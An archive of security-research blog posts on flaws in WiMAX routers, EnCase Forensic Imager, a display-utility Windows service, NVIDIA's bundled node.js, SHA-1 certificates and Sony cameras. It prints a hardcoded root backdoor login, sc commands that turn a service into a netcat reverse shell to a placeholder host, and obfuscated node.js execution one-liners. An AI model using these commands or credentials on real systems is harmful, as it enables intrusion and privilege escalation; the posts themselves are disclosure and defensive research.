Wednesday, June 7, 2017

Ghosts from the past: Authentication bypass and OEM backdoors in WiMAX routers

Update 2017-06-09: Huawei has released a Security Notice. They recommend "that users replace old Huawei routers with those of later products".

SEC Consult has found a vulnerability in several WiMAX routers, distributed by WiMAX ISPs to subscribers. The vulnerability allows an attacker to change the password of the admin user. An attacker can gain access to the device, access the network behind it and launch further attacks, add devices into a Mirai-like botnet or just simply spy on user. This vulnerability affects devices from GreenPacket, Huawei, MADA, ZTE, ZyXEL, and others. Some of the devices are accessible from the web (estimate is from 50.000 to 100.000). Affected vendors were informed by CERT/CC who released a vulnerability note (VU#350135, CVE-2017-3216).

Further information about the disclosure timeline and affected devices can be found in our advisory. This blog post has some highlights from the vulnerability analysis.

While doing research on HTTPS Certificate and SSH Key Reuse we stumbled upon a group of 80.000 devices that are using a certificate issued to "MatrixSSL Sample Server Cert" for the HTTPS web interface. The devices in question are WiMAX gateways likely developed by ZyXEL or its sister company MitraStar. We managed to get our hands on one device and did a bit of analysis.

WiMAX is a technology similar to LTE. Altough LTE is more popular nowadays, still many WiMAX networks exist all over the world.

Based on the information we got from internet-wide scan data, we know that a lot of devices expose a web server on the WAN interface. This is caused by a misconfiguration, or more likely carelessness by the ISPs that provide WiMAX gateways to customers. Web interfaces are usually a good place to hunt for vulnerabilities.

Like in all IoT pentests we grabbed a copy of the firmware (luckily available on ZyXEL's website, no hardware hacking via UART, JTAG and desoldering this time!) and uploaded it into our cloud based firmware analysis system IoT Inspector. After a few minutes the analysis results were available.

We start by looking at the file system structure. There are a bunch of HTML files in the /var/www/ directory, but usually these files are just HTML templates and do not contain any further logic.

excerpt from IoT Inspector file system browser

There are no traditional CGIs as well, so the web interface logic is likely embedded in the web server itself. The web server is implemented in /bin/mini_httpd.elf. The name mini_httpd would indicate that this is somehow related to the mini_httpd open source project, but either we are dealing with something completely different or a heavily modified version of the open source project. On first sight the web server does not contain the web interface logic as well, but there is a function that loads libraries located in the /lib/web_plugin/ directory using dlopen() and resolves several symbols.

Looking at /lib/web_plugin/ there is only one library called At the location of the symbol mime_handlers there is an array of structures that describe how different URI patterns are handled. This library also contains the implementation of the request handlers.

For each incoming request the web server tries to find a matching pattern in the mime handlers array and if a matching pattern is found, a function pointer to the function that handles the request will be called. Because we are in a good mood, we tell IDA Pro how we think how such structure looks like and convert the entries in the mime_handlers list.

We now have a pretty good understanding which URIs exist and how they are processed. The structure even contains an enum that specifies if the user has to be authenticated or not (we called it AUTH_REQUIRED/UNAUTHENTICATED). There are lots of URIs that do not require any authentication and are worth having a closer look, but we will focus on commit2.cgi.

The handler of this function just stores the arguments and values of an URL-encoded HTTP POST request into the internal database (key-value store, probably persisted in NVRAM). The simplest exploit for this vulnerability is to change the administrator password (argument ADMIN_PASSWD). Afterwards one can log in via the web interface and do some post-exploitation.

So what can we do from here on? Depends on the goal of the attacker. The web interface has a ton of functionality that could be of interest. This functionality allows changing the DNS servers (banking fraud, ad fraud), uploading malicious firmware that for example contains a botnet client or monitors the WiMAX customers internet activity. The SSH/Telnet daemon is quite interesting too...

OEM Backdoors in practice

The SSH/Telnet daemon can be enabled via the web interface. One can login using the same credentials as for the web interface and get a simple Cisco-style CLI. There are various commands that likely allow an attacker to escape it and get a regular Linux shell. But there is more:

While we focused on manual analysis of the web server for now, the results from IoT Inspector's automated analysis are quite interesting as well. One of the IoT Inspector plugins collects hardcoded Unix-style password hashes and submits them to our GPU-Server for cracking.

excerpt from IoT Inspector results

Some of the password hashes seem to be default password or placeholder files. The hashes in the file minihttpd.trans are quite interesting.

Despite its name, minihttpd.trans sets up the Linux /etc/passwd and /etc/shadow files at system boot. Below is an excerpt from the script.

This part of the script adds two backdoor users to the /etc/passwd and /etc/shadow files. The user mfgroot always has the same password hash $1$.3r0/KnH$eR.mFSJKIiY.y2QsJVsYK. (%TGBnhy6m), the password of the user root depends on the system variable ZY_CUSTOMER. The list contains the hashes we found in various firmware files.






Cracking the password hashes in the list an exercise left to the reader. Regardless of which OEM customer credentials are set, one can login using the credentials mfgroot:%TGBnhy6m and get a root shell.

Down the IoT supply chain...

The supply chain for IoT devices is often complex. The "commit2.cgi vulnerability" is located in libMTK hints that this library is part of MediaTek software, possibly an SDK that MediaTek provides for customers who build their products on MediaTek SoCs. This makes sense because the affected devices are all based on MediaTek hardware. These SDKs often come with everything that is required to use the hardware and even contain with a working web interface. Vendors can choose to use the whole SDK to build their product or just use some drivers/middleware and build the rest themselves.

CERT/CC contacted MediaTek regarding the vulnerability. They responded that their SDK code is not vulnerable and stated that they suspect that ZyXEL likely added the vulnerable code. Based on the information we suspect it went down like this:
  1. MediaTek manufactures a SoC for WiMAX products, provides SDK with sample web interface code to vendors.
  2. ZyXEL and their sister company MitraStar develops firmware based on the MediaTek SDK, introduces the "commit2.cgi vulnerability" and the "OEM backdoors".
  3. ZyXEL sells the products to ISPs.
  4. MitraStar works as an OEM for GreenPacket, Huawei, ZTE... who also sell the products to ISPs.
  5. ISPs sell/lease the devices to their subscribers as customer premises equipment (CPE).

Usually OEM customers will not even admit that there is an OEM. We specifically asked Huawei and got this response:

Long supply chains and OEMs make it hard to determine which products are affected by a vulnerability. This is one of the reasons why we developed IoT Inspector. One of the use cases is to see if a specific vulnerability exists in firmware loaded into IoT Inspector. We have used this approach successfully in the past, e.g. for the KCodes NetUSB and the AMX vulnerabilities.

excerpt from IoT Inspector results 

So we created a simple IoT Inspector plugin that detects the "commit2.cgi vulnerability" and used it on a firmware data set that contains the firmware of a few thousand products including all WiMAX CPE firmware we could find on the web. Using this approach we could determine which products from GreenPacket, Huawei, MADA, ZyXEL and ZTE are affected. For a list of affected devices see our advisory.

IoT device life cycle

The affected products are quite old, likely manufactured in the early 2010s. According to Huawei, all of their affected products are end-of-service since 2014, and will not receive any updates. Researcher Pierre Kim has found vulnerabilities in another set of Huawei WiMAX CPEs back in 2015 that suffer the same fate. We reported this vulnerability to CERT/CC who coordinated the vulnerability and released a vulnerability note (VU#350135), thanks! They unfortunately did not get a response from ZyXEL .
It's unlikely that any of the affected devices will receive updates, so the only solution is to replace the them.

ISPs should limit the attack surface on CPEs as much as possible. This is not just limited to the web interface and SSH/Telnet but also to the TR-069 Connection Request Server.

For further information regarding affected devices see our advisory. IoT Inspector now comes with a plugin that detects this vulnerability.


This research was done by Stefan Viehböck (@sviehbon behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:


Wednesday, May 17, 2017

Tracking the culprit: SEC Technologies and Fraunhofer IPK develop technology to identify criminal activities in enterprise networks

Violence, extremism and child abuse: A lot of criminal activities are captured in images and distributed via internet and social media. But how can companies protect their network if being abused for such a purpose? If operators do not want to be unwilling accomplices, they must meet necessary measures to prevent these crimes. SEC Technologies, SEC Consult’s subsidiary for technical innovation and development, and Fraunhofer IPK set a technical milestone in identifying criminal images: Traffiic (Traffic analysis for incriminating image content) is able to recognize acts of abuse by combining text and image analysis and machine learning, which makes it possible to evaluate the image content and raise alarm, if necessary.

The aim of the jointly-developed technology was a software, which is able to discover such content and helps to antagonize against the misuse of infrastructure. A modular system emerged, which can be integrated in the enterprise network as a passive component. Least possible delay in the network traffic and minimal hardware requirements make it easy to work with this technology in the background. Heart of the system is the possibility of data extraction: In case of findings the network operator gets informed immediately and is able to set countermeasures.

High quality technology against violent crime

Fraunhofer IPK developed a new system which detects acts of abuse by combining text and image analysis with machine learning. To achieve a high detection rate with a low error rate a few different, specialized and intelligent “classifieres” are used. So for example, the first “classifier” recognizes erotic figures. Such a “positive” finding activates another “classifier”, which was trained to recognize child abuse. Apart of image information also filename and eXiF-information, which shares facts about the used camera, are analyzed.

Markus Robin, General Manager SEC Consult: “Apprehending criminals and safeguarding victims was our guiding idea during the development of this technology. Studies show that in hidden services, 80 % of site visits were related to child abuse content. As cybersecurity experts it is also our responsibility to enable a safe world. More and more frequently, companies register a misuse of their network and infrastructure. That’s why we developed Traffiic – to support companies in their network protection, save them from the act of accomplice and set measures against the horrible sharing of violent crimes.”

In the course of this project SEC Technologies developed solutions for detecting and analyzing critical content in networks. The module implemented for data extraction allows to identify images and videos in the networks’ data streams and to extract and store them for analysis. Additional to extracting the files, evaluating the source of an image is of central importance. Based on former data analyses another module for the evaluation of network sources investigates the reputation of the system in question, by linking and examining different data sources like Who-is-data bases and IP reputation services. As a result, the system’s reputation can be included in the evaluation of an image and significantly enhances the accuracy of the whole evaluation. Dr. Franz Fotr, court-certified IT-security expert, said at the workshop in Berlin: “I am delighted that the cooperation between SEC Technologies and the Fraunhofer IPK (Institute for Production Systems and Design Technology) bears fruit. The developments of the project Traffiic empower companies of all sizes to monitor their infrastructure and to protect it from attacks. That makes it significantly more difficult for criminals to misuse infrastructures and contributes to stopping the spread of child pornography.”


Thursday, May 11, 2017

Chainsaw of Custody: Manipulating forensic evidence the easy way

When it comes to computer forensics, or for that matter forensics in general, one of the main challenges is to ensure that evidence that is collected is not tampered with. To achieve this, computer forensic experts adhere to a strict protocol and use many specialized hardware and software tools.

As we have shown time and time again, specialized security software is not immune to security vulnerabilities. Knowing this, we sometimes audit software products used for our core processes to achieve the best level of security for our customer's data. One of these software products is EnCase Forensic Imager.

EnCase Forensic Imager is a free tool that allows a forensic investigator to gather evidence from storage media. This evidence can then later be analyzed using the commercial EnCase Forensic suite. To efficiently gather evidence, EnCase Forensic Imager is able to process many different formats commonly used on storage media. However, parsing untrusted data from a suspect's storage device can be dangerous. There's always the risk that a suspect has manipulated his storage device so that forensic software fails to read any data, ignores incriminating data, or even takes over the investigator's machine. The latter is exactly what SEC Consult demonstrated to be possible with EnCase Forensic Imager in the latest advisory.

EnCase Forensic Imager crash - code execution (example: calc.exe)
EnCase Forensic Imager crash - code execution (example: calc.exe)

The attack

By writing a manipulated LVM2 partition (a hard disk format commonly used for Linux servers) on a storage device, an attacker could - if the device were ever to be analysed using EnCase Forensic Imager - take over an investigator's machine. When the investigator tries to read the device, EnCase Forensic Imager crashes - unbeknownst to the investigator, however, a lot more is happening. Through a buffer overflow security flaw, EnCase Forensic Imager can be tricked into executing data read from the storage device. Afterwards the code provided by the attacker has full control of the investigator's machine and can be used by the suspect to manipulate evidence.

The video below demonstrates a scenario where someone prepared a malicious USB storage medium for the case that it got analyzed by e.g. the authorities. When the investigator analyzes it using EnCase Forensic Imager, without their knowledge their machine connects to a remote server controlled by the suspect (arbitrary malicious code can be executed). The server can then access the investigator's machine to manipulate or delete evidence.

For technical details please refer to the advisory.

Who's affected?

We found that this issue to not affect a version of the full EnCase Forensic Suite we had available for testing. We did not verify whether this issue exists in other versions of EnCase Forensic (apparently EnCase Forensic and EnCase Forensic Imager share the same code base).

According to Guidance Software their products are used by many law enforcement and government agencies such as
  • the FBI
  • the CIA,
  • the US Department of Justice
  • the US Department of Homeland Security
  • and the London Metropolitan Police Service

as well as several major companies such as
  • Microsoft
  • Facebook,
  • and Oracle.

It is unclear whether these organisations use the EnCase Forensic Imager tool.

How to avoid attacks?

Some organisations use special machines without network or internet access to handle evidence data. While this is a very good security measure, it does not protect against this attack. Since this vulnerability allows a suspect to execute arbitrary code on these machines, the attacker could create malware that manipulates or deletes evidence based on predefined rules (e.g. delete all Excel files with a specific name pattern).

We provided details for this vulnerability to the vendor back in March 2017. Unfortunately, Guidance Software neither provided a fixed version nor communicated a schedule for fixing this vulnerability within 50 days. As per our responsible disclosure policy we therefore publicly released the advisory. The vendor does currently not provide a version of EnCase Forensic Imager without known vulnerabilities.

This is already the second security vulnerability in EnCase Forensic Imager that the SEC Consult Vulnerability Lab communicated to Guidance Software in the past few months. Back then, the vendor did not fix the security flaws as well (they also have not been resolved yet). This begs the question whether Guidance Software should rethink their security approach given the amount of trivial vulnerabilities, the high-profile customer base and the displayed handling of vulnerability reports.

We received the following statement on 11th May from Guidance Software which we will leave uncommented as we are still bewildered about it:

"We are aware and appreciate the issues raised by SEC Consult. The exploit SEC Consult claims to have found is an extreme edge case, much like the theoretical alerts they tried to promote in November. As always, we continue to examine alerts when they are submitted and apply changes to our systems as necessary.

Our products give investigators access to raw data on a disk so they can have complete access to all the information.  Dealing with raw data means there are times when malformed code can cause a crash or other issue on an investigator’s machine. We train users for the possibility of potential events like this and always recommend that they isolate their examination computers. After almost 20 years building forensic investigation software that is field-tested and court-proven, we find that the benefits of complete, bit-level visibility far outweigh the inconvenience of a very limited number of scenarios like this. If an issue does arise, it is something we work directly with the customer to resolve.

The nature of our business is dealing with raw data, and that has risk. We will continue to modify our software as necessary to deal with the continually changing environment. If necessary, we will take action and inform our customers. We do not consider this claim to be serious and it will not impact the performance of our products."


This research was done by Wolfgang Ettlinger (@ettisan) on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:


Tuesday, April 25, 2017

What unites HP, Philips and Fujitsu? One service and millions of vulnerable devices.

Yet another windows service privilege escalation?

During Windows client audits, it is quite common to try to find a way to escalate privileges in first place, to widen the attack surface and prepare for more sophisticated attacks (lateral movement, privilege escalation, rise and repeat). Besides known exploits in various kinds of software, it is always interesting to check for the low hanging fruits on the privilege escalation tree. Those sweet fruits include weak file- and folder permissions, unquoted service paths, or as described in this blogpost, weak service permissions, which can all lead to privilege escalation on Windows machines.

Those low hanging fruits appear on a regular basis in the life of a penetration tester and they are normally not that sophisticated from a technical perspective.

The identified vulnerable Windows service, is pre-installed on millions of laptops disguised as branded bloatware*. This changes a lot! Particularly due to the fact that the privilege escalation is now not limited to a single misconfigured device in a random company environment anymore.

* The [...] term bloatware is also commonly used to refer to preinstalled software on a device, usually included by the hardware manufacturer, that is mostly unwanted by the purchaser.

Bloatware, a common Cinderella Subject

Bloatware are those pieces of software, which are pre-installed on all your devices and nobody really makes use of them. Depending on the hardware vendor, some ship with a lot of bloatware and some try to keep their devices clean. But there is one thing, which have most of those pre-installed pieces of software in common, they are not self developed by the hardware vendor, but rather acquired from 3rd parties and as everybody should know it is very important to test self-developed as well as externally developed programs before going live. It is also very important that already at the point of the assignment of the application the security requirements have to be declared bindingly to the contractor. Before going live the contractor has to be obligated to supply a test installation of the system, which can undergo a security related approval test, conducted by security experts.

The past has already shown us, that such 3rd party bloatware acquired by OEM's is treated like a orphaned child and at best reviewed and tested by security experts fragmentary, or in the worst case the software gets rolled out without a proper security review at all. [1] [2] [3] 

A virtual on screen display, that can't be dangerous, right... RIGHT?

The vulnerability, described in this blogpost, was found in a core module of a so called virtual on screen display (vOSD). The purpose of a virtual on screen display is to replace the hardware adjustment buttons on screens, notebooks, smartphones and other kinds of displays. This should allow an user to quickly manage certain screen parameters (e.g. Rotation, Alignment, Color Values, Gamma values, Color temperature, Color saturation, Brightness, etc) with a simple piece of software, instead of struggling around with the hardware buttons on the display.

Portrait Displays Inc., the company responsible for developing the vulnerable software, describes their product as follows:

To get the most out of your display, it is important to set it up properly for your particular room lightning, display placement, and vision. Using the buttons on the edge of the display can be confusing, if not difficult.
Display Tune's OSD Enhancement takes all of the display's button functions and transfers them to the screen, where simple buttons and sliders make screen adjustments a breeze.

That doesn't sound too dangerous right? Changing the colors of a display is nothing what an attacker can use to attack a single PC, or a whole company environment. That's probably exactly what some big OEM's thought as well, while acquiring the vulnerable software. May he be shamed who thinks badly of it.


The exploitation itself is not too special, so nothing new to see here. For the sake of completeness, the way how the vulnerability was discovered and exploited is described below.

To identify the vulnerable Portrait Display SDK service, which is packaged by Portrait Display Inc. for various OEM's as a core package for virtual on screen displays, the permissions of the Portrait Display SDK service were retrieved with the built-in Windows command "sc". The output of the command for the vulnerable service can be seen below:






By "converting"[4] [5] the Security Descriptor Definition Language into human readable words, it is possible to identify the following permissions for the PdiService:

RW NT AUTHORITY\Authenticated Users


RW BUILTIN\Administrators



Due to the fact, that every authenticated user has write access on the service, an attacker is able to execute arbitrary code by changing the services binary path. Moreover, the Pdiservice is executed with SYSTEM permissions, resulting in privilege escalation.

The workflow to execute arbitrary code with elevated SYSTEM privileges is as follows:

1) Stop Service

sc stop pdiservice

2) Alter service binary path

sc config pdiservice binpath= "C:\nc.exe -nv $IP $PORT -e C:\WINDOWS\System32\cmd.exe"

3) Start Service

sc start pdiservice

4) Profit

The possibilities are endless, other useful payloads are the creation of new users, adding users to groups, changing privileges etc. All of the commands are executed with SYSTEM privileges.

The above commands were executed by the "sectester" user who doesn't have administrative privileges (it's a low privileged standard user). As the last figure shows, the user successfully escalated his privileges to SYSTEM.

One service to rule them all

One interesting fact is that this is not happening for the first time that pre-shipped bloatware has built-in vulnerabilities, or "undocumented features"[1] [2] [3]
It is quite juicy to observe, that companies selling millions of notebooks, PCs and convertibles simply do not care (enough) about security. The affected companies do have a net worth of multiple billions, but they do not have a few thousand euros/dollars/yen to conduct a proper security review on the software and services, they are acquiring from 3rd parties. This vulnerability would have been identified immediately in a thorough security review of the application/service if an audit would have been conducted by security experts before shipping devices with this software. Even automated vulnerability scans would detect such weak service permissions [6] [7].

But it seems that the problem is not limited to this service described in this blogpost. A lot of other services from big players are affected as well, the problem is that those vulnerabilities are most of the time downplayed or even ignored (e.g Dell's DellRctlService [8], or the Lansweeper Service [9] are/were affected from the exact same vulnerability but no one really noticed and the problem itself was downplayed).


There are two ways to get rid of the vulnerability.

Vendor Patch

The vendor provided a patch for the vulnerable software on their website:


To quickly get rid of the vulnerability, the permissions of the service can be altered with the built-in windows command "sc".
To completely remove the permissions of the "Authenticated Users" group, the following command can be used:

This results in the following set of permissions:

RW BUILTIN\Administrators

Affected Vendors/Software

The vendor confirmed that at least the following binaries are vulnerable

Fujitsu DisplayView Click Version 6.0

build id: dtune-fts-R2014-04-22-1630-07,6.01
build id: dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5

build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id: dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1

build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above

HP My Display Version 2.01

build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above

Philips Smart Control Premium Versions with issue: 2.23

build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

The following pieces of software are using the Portrait Displays SDK Service, SEC Consult did not evaluate if those packages are vulnerable as well:

-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6

Final Words

In the end, we want to thank Portrait Displays Inc. for resolving the issue in a professional way and responding regularly by providing continuous updates about the current state of the patch, as well as realizing that this vulnerability is critical instead of playing it down like other vendors have done in the past [8][9]. This is crucial for a well working responsible disclosure process. Please review the vendor communication timeline for more details [10].

We would also like to thank CERT/CC for setting up the encrypted communication channel between Portrait Displays Inc, as well as providing a CVE (CVE-2017-3210) and a CERT VU (

This research was done by Werner Schober on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:











Thursday, April 20, 2017

Abusing NVIDIA's node.js to bypass application whitelisting

Application Whitelisting


Update 2017-04-27: NVIDIA has resolved the issue very promptly and published a corresponding security bulletin here.

Application whitelisting is an important security concept which can be found in many environments during penetration testing. The basic idea is to create a whitelist of allowed applications and after that only allow the execution of applications which can be found in that whitelist. This prevents the execution of dropped malware and increases therefore the overall security of the system and network.

A very commonly used solution for application whitelisting is Microsoft AppLocker. Another concept is to enforce code and script integrity via signatures. This can be achieved on Microsoft Windows 10 or Server 2016 with Microsoft Device Guard.

SEC Consult Vulnerability Lab is doing research in this area since several years, bypass techniques were already presented in 2015 and 2016 at conferences such as CanSecWest, DeepSec, Hacktivity, BSides Vienna and IT-SeCX, see [1].

Knowing these bypass techniques is really important for administrators who maintain such protected environments because special rules must be applied to prevent these attacks.

Other good and recommended sources of known bypass techniques and hardening guides are blog posts from Casey Smith (subtee) [2], Matt Nelson (enigma0x3) [3] and Matt Graeber (mattifestation) [4].

NVIDIA's node.js

During a quick research in a different area, I came across a system which had NVIDIA drivers installed. The following executable gets installed by NVIDIA:

%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
This is a renamed version of node.js (but signed by NVIDIA Corporation) which can be verified via the meta data of the file:

That means we can find node.js on systems with NVIDIA drivers installed. Since this file is already on the system and it has a valid signature, it will be whitelisted by the application whitelisting solution.

Nowadays, the most common technique to bypass application whitelisting is to start PowerShell, because the target code can be passed inside arguments, it has full access to the Windows API, it is a signed binary from Microsoft and it can be found on all newer systems. However, it’s the first binary which gets removed from the whitelist by administrators, PowerShell v5 provides very good logging (attack detection and forensic), Device Guard UMCI (user mode code integrity) places PowerShell in Constrained Language mode and Antivirus solutions monitor malicious invocations of PowerShell.

Nearly similar PowerShell advantages can be achieved by abusing node.js from NVIDIA if the target system has these drivers installed. It can be started in interactive mode which means that scripts can be passed via pipe (payloads are not written to disk). For example, the following command starts the calculator via node.js:

echo require('child_process').exec("calc.exe") | "%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i 

From attacker perspective, this opens two possibilities. Either use node.js to directly interact with the Windows API (e.g. to disable application whitelisting or reflectively load an executable into the node.js process to run the malicious binary on behalf of the signed process) or to write the complete malware with node.js. Both options have the advantage, that the running process is signed and therefore bypasses anti-virus systems (reputation-based algorithms) per default.

Writing malware completely in node.js has the great side-affect, that NVIDIA already installs addons with useful functions such as:
  • WebcamEnable (NvSpCapsAPINode.node) 
  • ManualRecordEnable (NvSpCapsAPINode.node) 
  • GetDesktopCaptureSupport (NvSpCapsAPINode.node) 
  • SetMicSettings (NvSpCapsAPINode.node) 
  • RecordingPaths (NvSpCapsAPINode.node) 
  • CaptureScreenshot (NvCameraAPINode.node) 
However, to get the full power of the Windows API, we can write addons in C/C++ for node.js:

Node.js Addons are dynamically-linked shared objects, written in C or C++, that can be loaded into Node.js using the require() function, and used just as if they were an ordinary Node.js module. They are used primarily to provide an interface between JavaScript running in Node.js and C/C++ libraries. [5]

That means node.js has full access to the Microsoft Windows API and reflective DLL injection is possible.

To load such an Addon the path to the .node file must be passed to the require() function. Node files are normal PE files with some special exported functions, but it’s also possible to load any .dll file with one of the below code lines (an error will be thrown but DllMain gets executed):


A drawback of the reflective DLL injection attack is that it requires one file write because as far as of my knowledge node.js doesn’t support execution of modules from memory (or to directly access the Windows API). It’s therefore required to drop one loader-module to disk, then load this module which acts as a wrapper for the Windows API. Using the dropped module, the script can then access the Windows API and reflectively load any executable / library into the signed node.js process (similar concept to Invoke-ReflectivePEInjection.ps1 from PowerSploit, see [6]).

Please note, that the above approach drops one file to disk, however, this is only a legit node.js module. The real malware can afterwards be loaded via the loader-module from memory and is therefore never written to disk.

The file can be dropped to the following location which is writeable by standard users:

%systemdrive%\ProgramData\NVIDIA Corporation\Downloader\
Overcoming the “issue” of the one-file-write is not trivial. It’s not really a big problem (e.g. the dropped file is not malicious and will not be detected by an AntiVirus solution), however, it could block execution in some cases (e.g. DLL AppLocker rules). Such DLL rules can be bypassed in several ways depending on the used product and configuration. For example, it's possible to abuse AppLocker default rules which allow execution of all files in %windir%/*. Therefore, an attacker can drop his node module to the writeable tasks folder:

There are many similar writeable locations inside the %windir% folder. Let's assume that an administrator deny all these writeable locations by adding exclude rules for them. Is the system now secure?

The answer is NO because ADS can be abused. Since we can create a sub-folder in %windir%\tracing, we can create an ADS on the folder (for an explanation on ADS see Alex Inführ's blog post [7]). This can be used to bypass additional restrictions / monitoring rules. Let’s say we drop the following file:

All common APIs return as base folder %windir% and not %windir%\tracing which lets the module look like a file from the normal windows folder (however, a normal user does not have write permissions to %windir% ! ). 

This trick is already known and was described by James Forshaw on a different subject (unfortunately, I didn’t found the original post from him on it but in general all his posts are highly recommended).

What does that mean? Even if an administrator added additional exclude rules to the default rules to block writeable folders, we can still bypass AppLocker with the ADS.

The following figure shows this (AppLocker is configured to prevent C:\Windows\tracing\* and several other writeable locations): 

Here Microsoft's control.exe is used to load the library, however, it can also be loaded via node js (and using the fs-module it's possible to create the ADS).

Another possibility is to overwrite an existing library if application whitelisting was configured only based on paths (because of updates).

Here are some additional methods which I tried to avoide the file write at all:

Some methods which I tried for in-memory files 

UNC paths:

The code first tries to load the addon via SMB (port 445) and use WebDav (port 80) as fall-back. Since outgoing SMB traffic is in most environments forbidden, it would be good to directly access the data via WebDav (and it’s possible to create a WebDav server in JavaScript with node.js, but then firewall problems can occur). This is possible via paths such as the following two:


A good explanation why these paths work can be found at [8].

However, both path formats are not allowed inside node.js (the code later calls lstat which throws a file not found exception). Moreover, Microsoft internally writes the file to %localappdata%, making the approach useless to achieve file-less exploitation.

Another idea was to abuse named pipes which can be created with node.js code, however, named pipes are not seekable and therefore LoadLibrary() / require() fail.

Calling CreateFile with FILE_ATTRIBUTE_TEMPORARY and FILE_FLAG_DELETE_ON_CLOSE creates in most cases an in-memory file, however, node.js does not provide a way to pass these flags inside JavaScript code.

For people wondering why NVIDIA ships with node.js

At startup, NVIDIA starts a webserver via node.js (providing functionality like the above mentioned webcam control) on a randomized port. To protect against attacks a random secret cookie is created and must be passed to interact with the service. The information about the used port number and cookie value can be extracted from the following file:

%localappdata%\NVIDIA Corporation\NvNode\nodejs.json 


For red teamers, it’s the recommended approach to use the fs module from node.js to write a loader addon to disk which gives access to the Microsoft Windows API from JavaScript code. Then JavaScript code can be used to download the (encrypted) payload from the internet and with the Windows API the JavaScript code can reflectively load the payload into its own process space and execute it.

Node.js itself can be started via one of the public known techniques (see our slides at [1]), for example .chm, .lnk, .js, .jse, Java applets, macros, from an exploited process, pass-the-hash and so on.

Standard obfuscation tricks can be used to further hide the invocation. For example, the following code starts calc.exe but tries to further hide:

echo "outdated settings;set colors=";c=['\162\145\161\165\151\162\145','\143\150\151\154\144\137\160\162\157\143\145\163\163','\145\170\145\143','\143\141\154\143'];global[c[0]](c[1])[c[2]](c[3]);"; set specialChars='/*&^"|;"%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i

Such code can be used as persistence mechanism (auto start) because the called binary is signed by NVIDIA and will be considered as safe. Of course, additional anti-monitoring tricks such as ^ or %programdata:~0,-20% can be used somewhere inside the above command line to further prevent detection, however, such code is in my opinion traitorous.

For security consultants, it's recommended to search for node.js binaries (file size > 10 MB and binary contains Node.js strings) during client security audits to identify other vendors which ship node.js to clients.

For blue teamers, it’s recommended to remove the file from the whitelist (if possible) or at least monitor it’s invocation.

This research was done by René Freingruber (@ReneFreingruber) on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:







Wednesday, January 18, 2017

Last call to replace SHA-1 certificates

(c) iStock 629455088

All major browsers will stop accepting SHA-1 certificates in January/February. An average user will then not be able to distinguish between an invalid certificate (e.g. a certificate from an attacker) and a valid certificate that is using a SHA-1 hash. Effectively, this means that Internet services that still use SHA-1 certificates will become unusable for a large portion of users within the next few weeks.

Specifically, the following dates apply for the major browsers:

Browser vendors have provided ways to still use SHA-1 certificates issued by an internal CA (often used for e.g. an internal services like webmail). However, this is a temporary measure as e.g. Google Chrome will finally remove support for SHA-1 latest in 2019.

The following Censys query demonstrates, that there are still many TLS services world-wide that are affected by this. The query includes all HTTPS services with certificates that are a) not expired, b) that would otherwise be trusted by browsers and c) are signed using the SHA-1 hash algorithm:


Is this necessary?

By disabling the trust for SHA-1 certificates, browser vendors try to prevent a situation similar to what was happening in 2008. Well before 2008, is was commonly known that the MD5 hash algorithm exhibits serious weaknesses. Despite that fact, many certificate authorities issued MD5 certificates and major browsers accepted them. The attacks against MD5 have continuously improved over the years until in 2008, a group of researchers used the weaknesses in MD5 to successfully forge a certificate. Using this certificate, the researchers were able to issue arbitrary certificates for any service on the Internet. We know now that any criminal organisation that also conducted the same research and implemented a similar attack could have successfully intercepted arbitrary TLS connections (e.g. HTTPS) on the Internet.

There are many parallels between the situation then and the situation we now have with SHA-1. The first weaknesses in SHA-1 have been published in 2005. Since then, the attacks on weaknesses in SHA-1 have continuously been improved. In 2015 researchers estimated, that finding a collision in SHA-1 would cost between 75,000 $ and 120,000 $. A collision does not necessarily allow for a practical attack, being able to find a collision severely undermines the security of SHA-1. It is very hard to estimate how long it will take to be able to advance the current attacks to successfully forge a certificate. Moreover, it is possible that organisations outside of the academia already have knowledge of even more advanced attacks against SHA-1.

Therefore, it is necessary for browser vendors to disallow the use of SHA-1 certificates now, before we are in a situation similar to the situation in 2008. Google even goes so far as to warn against "the imminent possibility of attacks that could directly impact the integrity of the Web PKI".

The abandonment of the SHA-1 hash algorithm also affects code signing certificates. Although Windows code signing certificates with SHA-1 signatures can still be obtained, Certificate Authorities would probably be forced to revoke all SHA-1 certificates once a practical attack is known. This especially affects versions of Microsoft Windows that do not support any other hash algorithm for code signing (i.e. legacy Windows versions such as XP SP3, Windows Server 2008 and Windows Vista).


As a countermeasure we recommend to immediately replace affected certificates!

If the certificates are not replaced by 2017-02-14 (for IE11 / Edge at least, or even earlier for other browsers), a large portion of the users will not be able to access the affected services.

To test whether your Internet services are affected by this issue and other issues in the TLS configuration, SSLLabs provides a very useful tool that can be found here.

Tuesday, December 6, 2016

Backdoor in Sony IPELA Engine IP Cameras

SEC Consult has found a backdoor in Sony IPELA Engine IP Cameras, mainly used professionally by enterprises and authorities. This backdoor allows an attacker to run arbitrary code on the affected IP cameras. An attacker can use cameras to take a foothold in a network and launch further attacks, disrupt camera functionality, send manipulated images/video, add cameras into a Mirai-like botnet or to just simply spy on you. This vulnerability affects 80 different Sony camera models. Sony was informed by SEC Consult about the vulnerability and has since released updated firmware for the affected models.

